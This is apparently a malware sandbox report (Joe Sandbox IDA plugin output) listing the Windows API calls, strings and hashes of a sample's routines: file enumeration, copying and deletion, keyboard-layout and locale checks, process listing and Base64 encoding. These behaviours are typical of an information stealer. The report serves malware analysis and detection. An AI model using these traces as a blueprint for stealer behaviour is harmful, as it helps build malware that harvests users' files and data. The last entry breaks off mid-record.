                                                                                                                                                                                                                                              control_flow_graph 1197 6c1f35a0-6c1f35be 1198 6c1f38e9-6c1f38fb call 6c22b320 1197->1198 1199 6c1f35c4-6c1f35ed InitializeCriticalSectionAndSpinCount getenv 1197->1199 1200 6c1f38fc-6c1f390c strcmp 1199->1200 1201 6c1f35f3-6c1f35f5 1199->1201 1200->1201 1203 6c1f3912-6c1f3922 strcmp 1200->1203 1204 6c1f35f8-6c1f3614 QueryPerformanceFrequency 1201->1204 1206 6c1f398a-6c1f398c 1203->1206 1207 6c1f3924-6c1f3932 1203->1207 1208 6c1f374f-6c1f3756 1204->1208 1209 6c1f361a-6c1f361c 1204->1209 1206->1204 1212 6c1f3938 1207->1212 1213 6c1f3622-6c1f364a _strnicmp 1207->1213 1210 6c1f396e-6c1f3982 1208->1210 1211 6c1f375c-6c1f3768 1208->1211 1209->1213 1214 6c1f393d 1209->1214 1210->1206 1215 6c1f376a-6c1f37a1 QueryPerformanceCounter EnterCriticalSection 1211->1215 1212->1208 1216 6c1f3944-6c1f3957 _strnicmp 1213->1216 1217 6c1f3650-6c1f365e 1213->1217 1214->1216 1218 6c1f37b3-6c1f37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1215->1218 1219 6c1f37a3-6c1f37b1 1215->1219 1216->1217 1220 6c1f395d-6c1f395f 1216->1220 1217->1220 1221 6c1f3664-6c1f36a9 GetSystemTimeAdjustment 1217->1221 1222 6c1f37ed-6c1f37fa 1218->1222 1223 6c1f37fc-6c1f3839 LeaveCriticalSection 1218->1223 1219->1218 1224 6c1f36af-6c1f3749 call 6c22c110 1221->1224 1225 6c1f3964 1221->1225 1222->1223 1226 6c1f383b-6c1f3840 1223->1226 1227 6c1f3846-6c1f38ac call 6c22c110 1223->1227 1224->1208 1225->1210 1226->1215 1226->1227 1232 6c1f38b2-6c1f38ca 1227->1232 1233 6c1f38dd-6c1f38e3 1232->1233 1234 6c1f38cc-6c1f38db 1232->1234 1233->1198 1234->1232 1234->1233
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C27F688,00001000), ref: 6C1F35D5
                                                                                                                                                                                                                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C1F35E0
                                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 6C1F35FD
                                                                                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C1F363F
                                                                                                                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C1F369F
                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6C1F36E4
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C1F3773
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6C27F688), ref: 6C1F377E
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6C27F688), ref: 6C1F37BD
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C1F37C4
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6C27F688), ref: 6C1F37CB
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6C27F688), ref: 6C1F3801
                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6C1F3883
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C1F3902
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C1F3918
                                                                                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C1F394C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716177431.000000006C1F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 6C1F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716123546.000000006C1F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716499748.000000006C27E000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716526775.000000006C282000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c1f0000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                              • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                              • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                              • Opcode ID: 802002ac31a21977ce96fb24dc520515005916428c3677c9f1a4dcb116926394
                                                                                                                                                                                                                                              • Instruction ID: 07acd1192a5535babc1cbdba94297866f5987b84758b014b325702bf9fde7978
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 802002ac31a21977ce96fb24dc520515005916428c3677c9f1a4dcb116926394
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18B1D471B093209FDB09DF29C48865A77F5FB89704F05892DECA9D7790D7349902CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                              • API String ID: 180737720-445461498
                                                                                                                                                                                                                                              • Opcode ID: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
                                                                                                                                                                                                                                              • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,?), ref: 00411BB4
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                              • Opcode ID: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
                                                                                                                                                                                                                                              • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                              • SetThreadLocale.KERNEL32 ref: 00401AC2
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstLocaleNextThreadlstrlen
                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                              • API String ID: 1950708506-1173974218
                                                                                                                                                                                                                                              • Opcode ID: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
                                                                                                                                                                                                                                              • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                                              • Opcode ID: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
                                                                                                                                                                                                                                              • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                                              • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                              • Opcode ID: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
                                                                                                                                                                                                                                              • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                              • API String ID: 433455689-1173974218
                                                                                                                                                                                                                                              • Opcode ID: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
                                                                                                                                                                                                                                              • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                                              • String ID: >N@
                                                                                                                                                                                                                                              • API String ID: 80407269-3381801619
                                                                                                                                                                                                                                              • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                              • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                              • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04086460,00000000,?,0041D758,00000000,?,00000000,00000000,?,04086E98,00000000), ref: 004144C0
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                              • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
